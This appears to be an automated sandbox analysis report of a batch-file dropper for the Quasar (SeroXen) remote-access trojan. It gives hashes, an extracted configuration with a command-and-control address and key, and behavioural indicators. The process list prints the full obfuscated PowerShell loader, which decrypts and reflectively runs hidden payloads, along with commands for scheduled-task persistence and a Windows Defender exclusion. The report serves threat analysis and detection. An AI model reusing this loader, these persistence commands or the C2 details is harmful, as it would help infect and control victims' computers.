Analysis
-
max time kernel
91s -
max time network
92s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
28-04-2024 16:14
Static task
static1
Behavioral task
behavioral1
Sample
rename me.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
rename me.bat
Resource
win10v2004-20240426-en
General
-
Target
rename me.bat
-
Size
514KB
-
MD5
414264bb47935bed191128cf44f3a2cd
-
SHA1
df49e4f8bc8d388c9b9398f29b0de0e72e79b130
-
SHA256
a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef
-
SHA512
c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66
-
SSDEEP
12288:40xb2yL+sSyycyuVWTuM+EiWCCPt2EIKgEtoOT9ah:46bTLrSyycy9uM+EipCfhgTOTAh
Malware Config
Extracted
quasar
3.1.5
SeroXen
147.185.221.19:33587
$Sxr-2rfrZTKITtK0P0zGYG
-
encryption_key
Yr0YpBPNd3kXsl43jZMx
-
install_name
$sxr-sdinwn.exe
-
log_directory
$sxr
-
reconnect_delay
3000
-
startup_key
$sxr-metsha
-
subdirectory
sxr
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/536-75-0x0000000006D70000-0x0000000006DDE000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 17 536 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
Processes:
$sxr-sdinwn.exepid process 3628 $sxr-sdinwn.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 1592 ipconfig.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exe$sxr-sdinwn.exepowershell.exepid process 2720 powershell.exe 2720 powershell.exe 3340 powershell.exe 3340 powershell.exe 536 powershell.exe 536 powershell.exe 3628 $sxr-sdinwn.exe 4904 powershell.exe 4904 powershell.exe 3628 $sxr-sdinwn.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2720 powershell.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeIncreaseQuotaPrivilege 3340 powershell.exe Token: SeSecurityPrivilege 3340 powershell.exe Token: SeTakeOwnershipPrivilege 3340 powershell.exe Token: SeLoadDriverPrivilege 3340 powershell.exe Token: SeSystemProfilePrivilege 3340 powershell.exe Token: SeSystemtimePrivilege 3340 powershell.exe Token: SeProfSingleProcessPrivilege 3340 powershell.exe Token: SeIncBasePriorityPrivilege 3340 powershell.exe Token: SeCreatePagefilePrivilege 3340 powershell.exe Token: SeBackupPrivilege 3340 powershell.exe Token: SeRestorePrivilege 3340 powershell.exe Token: SeShutdownPrivilege 3340 powershell.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeSystemEnvironmentPrivilege 3340 powershell.exe Token: SeRemoteShutdownPrivilege 3340 powershell.exe Token: SeUndockPrivilege 3340 powershell.exe Token: SeManageVolumePrivilege 3340 powershell.exe Token: 33 3340 powershell.exe Token: 34 3340 powershell.exe Token: 35 3340 powershell.exe Token: 36 3340 powershell.exe Token: SeIncreaseQuotaPrivilege 3340 powershell.exe Token: SeSecurityPrivilege 3340 powershell.exe Token: SeTakeOwnershipPrivilege 3340 powershell.exe Token: SeLoadDriverPrivilege 3340 powershell.exe Token: SeSystemProfilePrivilege 3340 powershell.exe Token: SeSystemtimePrivilege 3340 powershell.exe Token: SeProfSingleProcessPrivilege 3340 powershell.exe Token: SeIncBasePriorityPrivilege 3340 powershell.exe Token: SeCreatePagefilePrivilege 3340 powershell.exe Token: SeBackupPrivilege 3340 powershell.exe Token: SeRestorePrivilege 3340 powershell.exe Token: SeShutdownPrivilege 3340 powershell.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeSystemEnvironmentPrivilege 3340 powershell.exe Token: SeRemoteShutdownPrivilege 3340 powershell.exe Token: SeUndockPrivilege 3340 powershell.exe Token: SeManageVolumePrivilege 3340 powershell.exe Token: 33 3340 powershell.exe Token: 34 3340 powershell.exe Token: 35 3340 powershell.exe Token: 36 3340 powershell.exe Token: SeIncreaseQuotaPrivilege 3340 powershell.exe Token: SeSecurityPrivilege 3340 powershell.exe Token: SeTakeOwnershipPrivilege 3340 powershell.exe Token: SeLoadDriverPrivilege 3340 powershell.exe Token: SeSystemProfilePrivilege 3340 powershell.exe Token: SeSystemtimePrivilege 3340 powershell.exe Token: SeProfSingleProcessPrivilege 3340 powershell.exe Token: SeIncBasePriorityPrivilege 3340 powershell.exe Token: SeCreatePagefilePrivilege 3340 powershell.exe Token: SeBackupPrivilege 3340 powershell.exe Token: SeRestorePrivilege 3340 powershell.exe Token: SeShutdownPrivilege 3340 powershell.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeSystemEnvironmentPrivilege 3340 powershell.exe Token: SeRemoteShutdownPrivilege 3340 powershell.exe Token: SeUndockPrivilege 3340 powershell.exe Token: SeManageVolumePrivilege 3340 powershell.exe Token: 33 3340 powershell.exe Token: 34 3340 powershell.exe Token: 35 3340 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 4048 wrote to memory of 2720 4048 cmd.exe powershell.exe PID 4048 wrote to memory of 2720 4048 cmd.exe powershell.exe PID 4048 wrote to memory of 2720 4048 cmd.exe powershell.exe PID 2720 wrote to memory of 3340 2720 powershell.exe powershell.exe PID 2720 wrote to memory of 3340 2720 powershell.exe powershell.exe PID 2720 wrote to memory of 3340 2720 powershell.exe powershell.exe PID 2720 wrote to memory of 3144 2720 powershell.exe WScript.exe PID 2720 wrote to memory of 3144 2720 powershell.exe WScript.exe PID 2720 wrote to memory of 3144 2720 powershell.exe WScript.exe PID 3144 wrote to memory of 4256 3144 WScript.exe cmd.exe PID 3144 wrote to memory of 4256 3144 WScript.exe cmd.exe PID 3144 wrote to memory of 4256 3144 WScript.exe cmd.exe PID 4256 wrote to memory of 536 4256 cmd.exe powershell.exe PID 4256 wrote to memory of 536 4256 cmd.exe powershell.exe PID 4256 wrote to memory of 536 4256 cmd.exe powershell.exe PID 536 wrote to memory of 3992 536 powershell.exe schtasks.exe PID 536 wrote to memory of 3992 536 powershell.exe schtasks.exe PID 536 wrote to memory of 3992 536 powershell.exe schtasks.exe PID 536 wrote to memory of 3628 536 powershell.exe $sxr-sdinwn.exe PID 536 wrote to memory of 3628 536 powershell.exe $sxr-sdinwn.exe PID 536 wrote to memory of 3628 536 powershell.exe $sxr-sdinwn.exe PID 536 wrote to memory of 4904 536 powershell.exe powershell.exe PID 536 wrote to memory of 4904 536 powershell.exe powershell.exe PID 536 wrote to memory of 4904 536 powershell.exe powershell.exe PID 536 wrote to memory of 1592 536 powershell.exe ipconfig.exe PID 536 wrote to memory of 1592 536 powershell.exe ipconfig.exe PID 536 wrote to memory of 1592 536 powershell.exe ipconfig.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rename me.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rename me.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rename me.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_812_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_812.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_812.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_812.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_812.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_812.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\System32\ipconfig.exe" /flushdns6⤵
- Gathers network information
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD59751fcb3d8dc82d33d50eebe53abe314
SHA17a680212700a5d9f3ca67c81e0e243834387c20c
SHA256ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7
SHA51254907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5d17dfffbcebe48829998fc6db28bd398
SHA1627fb873a2f7dc52de40a88da1f83f58844307c5
SHA256a81bd9823c9e310a24b6169cd34a4bfaaaf74f47824761cbda187ec4b3aa4c7c
SHA512981e70b6beb2086da6688d12024c8b80bfe323e1a15ddae8b5c4f33dc19a9fb6d4d9ec9b24eb1424275d264168a83cdf3c5d43106ea5ba72528723e4c731eadc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD5fbb527ccccbdba136a804d49f98dd18e
SHA18a5b5c498dbac54b39337c0b6494afae805fd80d
SHA25668a515f431f8c22e8e95cbdbfe287d87bb203e1b5c7ade3f46e573dfc776bca4
SHA51264d5aa7b9b684654a2d0e15727e9bc2dd51f669bd0f1df22964721bc7c59ae486928d52222056d8d584f6ff8b4db9da15dbd9886984b0adfff8fda1f23e7a3f3
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5mvra5n.tgx.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\startup_str_812.batFilesize
514KB
MD5414264bb47935bed191128cf44f3a2cd
SHA1df49e4f8bc8d388c9b9398f29b0de0e72e79b130
SHA256a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef
SHA512c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66
-
C:\Users\Admin\AppData\Roaming\startup_str_812.vbsFilesize
115B
MD5da50c767899e89be2747b807d950b672
SHA1d7495afae53905b5c680f23340ad8f9a8101cda9
SHA25627e32b40ca044aee97ae9fa954bba97d3d81d27dead54917426d72826e7af476
SHA512b5d7133fc8216a8a0de9d370f49255df75c0f62b276775791d57d6473e521aaa3ed88280a52078ee8aeaa31727d677166fa1dcfd3ac8062775f613061d0badaf
-
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
memory/536-79-0x0000000007240000-0x000000000727C000-memory.dmpFilesize
240KB
-
memory/536-78-0x0000000006F90000-0x0000000006FA2000-memory.dmpFilesize
72KB
-
memory/536-76-0x0000000006E80000-0x0000000006F12000-memory.dmpFilesize
584KB
-
memory/536-75-0x0000000006D70000-0x0000000006DDE000-memory.dmpFilesize
440KB
-
memory/2720-20-0x00000000070C0000-0x00000000070DA000-memory.dmpFilesize
104KB
-
memory/2720-19-0x0000000007710000-0x0000000007D8A000-memory.dmpFilesize
6.5MB
-
memory/2720-21-0x00000000028D0000-0x00000000028D8000-memory.dmpFilesize
32KB
-
memory/2720-22-0x0000000007150000-0x00000000071B2000-memory.dmpFilesize
392KB
-
memory/2720-23-0x0000000009340000-0x00000000098E4000-memory.dmpFilesize
5.6MB
-
memory/2720-1-0x0000000004C10000-0x0000000004C20000-memory.dmpFilesize
64KB
-
memory/2720-2-0x0000000002A60000-0x0000000002A96000-memory.dmpFilesize
216KB
-
memory/2720-3-0x0000000005250000-0x0000000005878000-memory.dmpFilesize
6.2MB
-
memory/2720-4-0x00000000051B0000-0x00000000051D2000-memory.dmpFilesize
136KB
-
memory/2720-77-0x0000000075090000-0x0000000075840000-memory.dmpFilesize
7.7MB
-
memory/2720-0-0x0000000075090000-0x0000000075840000-memory.dmpFilesize
7.7MB
-
memory/2720-6-0x0000000005A20000-0x0000000005A86000-memory.dmpFilesize
408KB
-
memory/2720-5-0x00000000059B0000-0x0000000005A16000-memory.dmpFilesize
408KB
-
memory/2720-16-0x0000000005A90000-0x0000000005DE4000-memory.dmpFilesize
3.3MB
-
memory/2720-17-0x0000000005F60000-0x0000000005F7E000-memory.dmpFilesize
120KB
-
memory/2720-18-0x0000000005F80000-0x0000000005FCC000-memory.dmpFilesize
304KB
-
memory/3340-48-0x0000000007710000-0x000000000772E000-memory.dmpFilesize
120KB
-
memory/3340-44-0x0000000005220000-0x0000000005230000-memory.dmpFilesize
64KB
-
memory/3340-53-0x0000000005220000-0x0000000005230000-memory.dmpFilesize
64KB
-
memory/3340-52-0x0000000007AC0000-0x0000000007AD1000-memory.dmpFilesize
68KB
-
memory/3340-51-0x0000000007B50000-0x0000000007BE6000-memory.dmpFilesize
600KB
-
memory/3340-50-0x0000000007930000-0x000000000793A000-memory.dmpFilesize
40KB
-
memory/3340-49-0x0000000007790000-0x0000000007833000-memory.dmpFilesize
652KB
-
memory/3340-25-0x0000000075090000-0x0000000075840000-memory.dmpFilesize
7.7MB
-
memory/3340-37-0x0000000070EB0000-0x0000000070EFC000-memory.dmpFilesize
304KB
-
memory/3340-36-0x0000000007750000-0x0000000007782000-memory.dmpFilesize
200KB
-
memory/3340-26-0x0000000005220000-0x0000000005230000-memory.dmpFilesize
64KB
-
memory/3340-56-0x0000000075090000-0x0000000075840000-memory.dmpFilesize
7.7MB
-
memory/3628-105-0x0000000007040000-0x0000000007084000-memory.dmpFilesize
272KB
-
memory/3628-117-0x0000000007420000-0x0000000007496000-memory.dmpFilesize
472KB
-
memory/4904-104-0x0000000006D20000-0x0000000006D42000-memory.dmpFilesize
136KB
-
memory/4904-116-0x00000000071D0000-0x0000000007273000-memory.dmpFilesize
652KB
-
memory/4904-118-0x00000000073B0000-0x00000000073C1000-memory.dmpFilesize
68KB
-
memory/4904-119-0x00000000073E0000-0x00000000073EE000-memory.dmpFilesize
56KB
-
memory/4904-120-0x00000000073F0000-0x0000000007404000-memory.dmpFilesize
80KB
-
memory/4904-121-0x0000000007B20000-0x0000000007B3A000-memory.dmpFilesize
104KB
-
memory/4904-122-0x0000000007B10000-0x0000000007B18000-memory.dmpFilesize
32KB
-
memory/4904-106-0x0000000070EB0000-0x0000000070EFC000-memory.dmpFilesize
304KB